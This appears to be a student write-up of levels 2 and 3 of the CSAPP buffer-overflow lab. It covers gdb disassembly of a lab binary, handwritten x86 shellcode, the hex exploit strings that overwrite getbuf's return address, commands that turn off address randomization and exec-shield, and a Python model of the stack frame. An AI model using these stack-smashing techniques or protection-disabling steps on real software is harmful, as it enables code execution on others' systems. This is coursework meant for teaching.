Level 2: firecracker (30 points)
bufbomb contains a function bang:

    int global_value = 0;

    void bang(int val)
    {
        if (global_value == cookie) {
            printf("Bang!: You set global_value to 0x%x\n", global_value);
            validate(2);
        } else
            printf("Misfire: global_value = 0x%x\n", global_value);
        exit(0);
    }
As in the previous two levels, getbuf must return into bang instead of test; in addition, the global variable global_value must be set to your own cookie before bang runs.
Starting with this level, executable shellcode has to be placed in getbuf's buf. My experiments showed that the stack of my Ubuntu 12.04.5 machine is not executable (can somebody tell me why?), and I found no way to turn that off, so I installed Fedora 7 in a virtual machine, disabled the non-executable stack and address randomization as follows, and continued the experiment there:
    sysctl -w kernel.randomize_va_space=0
    sysctl -w kernel.exec-shield=0
Disassembling bang in gdb shows that the global variable global_value is stored at 0x804aa60 and that bang's entry address is 0x804898c.
    [buflab]# gdb -q ./bufbomb
    Using host libthread_db library "/lib/libthread_db.so.1".
    (gdb) disass bang
    Dump of assembler code for function bang:
    0x0804898c <bang+0>:    mov    0x804aa60,%eax        ; load global_value into %eax
    0x08048991 <bang+5>:    push   %ebp
    0x08048992 <bang+6>:    mov    %esp,%ebp
    0x08048994 <bang+8>:    sub    $0x8,%esp
    0x08048997 <bang+11>:   cmp    0x804aa50,%eax        ; compare the cookie with global_value
    0x0804899d <bang+17>:   jne    0x80489c0 <bang+52>
    0x0804899f <bang+19>:   add    $0xfffffff8,%esp
    0x080489a2 <bang+22>:   push   %eax
    0x080489a3 <bang+23>:   push   $0x80493e0
    0x080489a8 <bang+28>:   call   0x8048748 <printf@plt>
    0x080489ad <bang+33>:   add    $0xfffffff4,%esp
    0x080489b0 <bang+36>:   push   $0x2
    0x080489b2 <bang+38>:   call   0x8048c30 <validate>
    0x080489b7 <bang+43>:   add    $0x20,%esp
    0x080489ba <bang+46>:   jmp    0x80489d1 <bang+69>
    0x080489bc <bang+48>:   lea    0x0(%esi),%esi
    0x080489c0 <bang+52>:   add    $0xfffffff8,%esp
    0x080489c3 <bang+55>:   push   %eax
    0x080489c4 <bang+56>:   push   $0x8049405
    0x080489c9 <bang+61>:   call   0x8048748 <printf@plt>
    0x080489ce <bang+66>:   add    $0x10,%esp
    0x080489d1 <bang+69>:   add    $0xfffffff4,%esp
Next, the shellcode that sets the global variable and then jumps to bang is laid out in buf, and getbuf's return address is overwritten with the address of buf.
[Figure: Buflayout3.png, stack layout of the Level 2 exploit string]
Find the address of buf in the debugger.
    (gdb) disass getbuf
    Dump of assembler code for function getbuf:
    0x08048a44 <getbuf+0>:  push   %ebp
    0x08048a45 <getbuf+1>:  mov    %esp,%ebp
    0x08048a47 <getbuf+3>:  sub    $0x18,%esp
    0x08048a4a <getbuf+6>:  add    $0xfffffff4,%esp
    0x08048a4d <getbuf+9>:  lea    0xfffffff4(%ebp),%eax   ; buf = %ebp-12
    0x08048a50 <getbuf+12>: push   %eax
    0x08048a51 <getbuf+13>: call   0x8048b50 <Gets>
    0x08048a56 <getbuf+18>: mov    $0x1,%eax
    0x08048a5b <getbuf+23>: mov    %ebp,%esp
    0x08048a5d <getbuf+25>: pop    %ebp
    0x08048a5e <getbuf+26>: ret
    End of assembler dump.
Set a breakpoint at 0x08048a50 and run; this shows that buf is at 0xbfffb0bc.
    (gdb) b *0x8048a50
    Breakpoint 1 at 0x8048a50
    (gdb) run -t heen
    Starting program: /root/Desktop/buflab/bufbomb -t heen
    Team: heen
    Cookie: 0x5573b7cf
    (gdb) p $ebp+0xfffffff4
    $2 = (void *) 0xbfffb0bc
Next, write the shellcode:
    [buflab]# cat exploit3_shellcode.s
    pushl $0x804898c            # bang's entry address
    movl $0x5573b7cf,%eax
    movl %eax,0x804aa60         # set global_value to the cookie
    ret
    [buflab]# gcc -c exploit3_shellcode.s
    [buflab]# objdump -d exploit3_shellcode.o

    exploit3_shellcode.o:     file format elf32-i386

    Disassembly of section .text:

    00000000 <.text>:
       0:   68 8c 89 04 08          push   $0x804898c
       5:   b8 cf b7 73 55          mov    $0x5573b7cf,%eax
       a:   a3 60 aa 04 08          mov    %eax,0x804aa60
       f:   c3                      ret
This gives the shellcode's machine code in hex: 16 bytes, which is just enough to fill buf (12 bytes) and the saved %ebp (4 bytes) that sit below the return address. The exploit string is therefore the shellcode followed by the address of buf.
    [buflab]# cat exploit3.txt
    68 8c 89 04 08 b8 cf b7 73 55 a3 60 aa 04 08 c3 bc b0 ff bf
    [buflab]# cat exploit3.txt | ./sendstring | ./bufbomb -t heen
    Team: heen
    Cookie: 0x5573b7cf
    Type string:Bang!: You set global_value to 0x5573b7cf
    NICE JOB!
Level 3: dynamite (40 points)
This level requires getbuf to return into test as normal, but without corrupting the stack state that test maintains (test checks a local variable to detect stack corruption), and the value getbuf returns to test must be your own cookie. The test function is as follows:
    void test()
    {
        int val;
        volatile int local = 0xdeadbeef;
        val = getbuf();
        /* check for corrupted stack */
        if (local != 0xdeadbeef) {
            printf("Sabotaged!: the stack has been corrupted\n");
        } else if (val == cookie) {
            printf("Boom!: getbuf returned 0x%x\n", val);
            validate(3);
        } else {
            printf("Dud: getbuf returned 0x%x\n", val);
        }
    }
So the shellcode must not break the stack state of test, the caller of getbuf: it has to return into test, and the saved frame pointer (SFP) has to be restored to test's %ebp, since test reads local relative to %ebp. The frame pointer can be restored in two ways: inside the shellcode, or by placing test's %ebp at the right position in the exploit string. We chose the second method here.
Disassembling test gives the normal return address of the call to getbuf.
    (gdb) disass test
    Dump of assembler code for function test:
    0x080489dc <test+0>:    push   %ebp
    0x080489dd <test+1>:    mov    %esp,%ebp
    0x080489df <test+3>:    sub    $0x18,%esp
    0x080489e2 <test+6>:    movl   $0xdeadbeef,0xfffffffc(%ebp)
    0x080489e9 <test+13>:   call   0x8048a44 <getbuf>
    0x080489ee <test+18>:   mov    %eax,%edx               ; 0x080489ee is the return address of the getbuf call
    0x080489f0 <test+20>:   mov    0xfffffffc(%ebp),%eax
    0x080489f3 <test+23>:   cmp    $0xdeadbeef,%eax
    0x080489f8 <test+28>:   je     0x8048a10 <test+52>
    0x080489fa <test+30>:   add    $0xfffffff4,%esp
    0x080489fd <test+33>:   push   $0x8049440
    0x08048a02 <test+38>:   call   0x8048748 <printf@plt>
    0x08048a07 <test+43>:   jmp    0x8048a40 <test+100>
    0x08048a09 <test+45>:   lea    0x0(%esi),%esi
    0x08048a10 <test+52>:   cmp    0x804aa50,%edx
    0x08048a16 <test+58>:   jne    0x8048a32 <test+86>
    0x08048a18 <test+60>:   add    $0xfffffff8,%esp
    0x08048a1b <test+63>:   push   %edx
    0x08048a1c <test+64>:   push   $0x804946a
    0x08048a21 <test+69>:   call   0x8048748 <printf@plt>
    0x08048a26 <test+74>:   add    $0xfffffff4,%esp
    0x08048a29 <test+77>:   push   $0x3
    ---Type <return> to continue, or q <return> to quit---
Break at 0x80489df and read test's frame pointer: its %ebp is 0xbfffb0e8.
    (gdb) b *0x80489df
    Breakpoint 2 at 0x80489df
    (gdb) run -t heen
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /root/Desktop/buflab/bufbomb -t heen
    Team: heen
    Cookie: 0x5573b7cf

    Breakpoint 2, 0x080489df in test ()
    (gdb) p $ebp
    $ = (void *) 0xbfffb0e8
Write the shellcode and get its machine code in hex:
    [buflab]# cat exploit4_shellcode.s
    movl $0x5573b7cf,%eax
    push $0x80489ee
    ret
    [buflab]# gcc -c exploit4_shellcode.s
    [buflab]# objdump -d exploit4_shellcode.o

    exploit4_shellcode.o:     file format elf32-i386

    Disassembly of section .text:

    00000000 <.text>:
       0:   b8 cf b7 73 55          mov    $0x5573b7cf,%eax   ; set getbuf's return value to the cookie
       5:   68 ee 89 04 08          push   $0x80489ee         ; push getbuf's normal return address
       a:   c3                      ret
Putting the above together gives the exploit string: the 11 shellcode bytes, one filler byte, test's %ebp, and the address of buf. The filler byte ff can be any value except newline (0a) and the null byte (00), which would terminate Gets early.
    [buflab]# cat exploit4.txt
    b8 cf b7 73 55 68 ee 89 04 08 c3 ff e8 b0 ff bf bc b0 ff bf
    [buflab]# cat exploit4.txt | ./sendstring | ./bufbomb -t heen
    Team: heen
    Cookie: 0x5573b7cf
    Type string:Boom!: getbuf returned 0x5573b7cf
    NICE JOB!
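As an added example that is not part of the original writeup, the following Python model of getbuf's frame uses the offsets and addresses found above (buf = %ebp-12, saved %ebp, return address; Gets stopping at newline or NUL) to show where the bytes of an input string land and whether test's corruption check on local would still see an intact frame. It covers both the Level 2 and Level 3 strings; the function and variable names are my own.

```python
# Added example, not from the original lab writeup. Models getbuf's stack
# frame using the offsets from the disassembly above and reports what
# getbuf's epilogue and test()'s stack check would see for a given input.
import struct

BUF_SIZE = 12               # lea 0xfffffff4(%ebp),%eax  ->  buf = %ebp-12
GETBUF_RET = 0x080489EE     # normal return address of the getbuf call in test
TEST_EBP = 0xBFFFB0E8       # test's %ebp, read at the breakpoint at 0x80489df
BUF_ADDR = 0xBFFFB0BC       # address of buf, read at the breakpoint at 0x8048a50


def parse_hex(dump):
    """Turn a space-separated hex dump (the exploit*.txt format) into bytes."""
    return bytes(int(tok, 16) for tok in dump.split())


def frame_after_gets(payload, test_ebp=TEST_EBP):
    """Copy payload into getbuf's frame the way Gets would and report the
    saved %ebp and return address that getbuf's epilogue will then use."""
    # Gets stops at newline or NUL, so nothing after such a byte is copied.
    for terminator in (0x0A, 0x00):
        if terminator in payload:
            payload = payload[:payload.index(terminator)]
    # Intact frame before the overflow: buf (12 bytes) | saved %ebp | ret
    frame = bytearray(BUF_SIZE) + struct.pack("<II", test_ebp, GETBUF_RET)
    frame[:len(payload)] = payload          # bytes past 12 overwrite SFP, then ret
    sfp, ret = struct.unpack_from("<II", frame, BUF_SIZE)
    return {
        "copied": len(payload),
        "sfp": sfp,
        "ret": ret,
        "jumps_to_buf": ret == BUF_ADDR,
        # test() reads local from 0xfffffffc(%ebp); with a wrong %ebp it reads
        # some other word, misses 0xdeadbeef and prints "Sabotaged!".
        "test_frame_intact": sfp == test_ebp,
    }


if __name__ == "__main__":
    for name, dump in (("exploit3", "68 8c 89 04 08 b8 cf b7 73 55 a3 60 aa 04 08 c3 bc b0 ff bf"),
                       ("exploit4", "b8 cf b7 73 55 68 ee 89 04 08 c3 ff e8 b0 ff bf bc b0 ff bf")):
        print(name, {k: hex(v) if isinstance(v, int) and k != "copied" else v
                     for k, v in frame_after_gets(parse_hex(dump)).items()})
```

Running it shows why Level 2 could ignore the saved %ebp (bang ends in exit(0), so test never resumes) while Level 3 must restore it.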
CSAPP Buffer Overflow Experiment Record (II)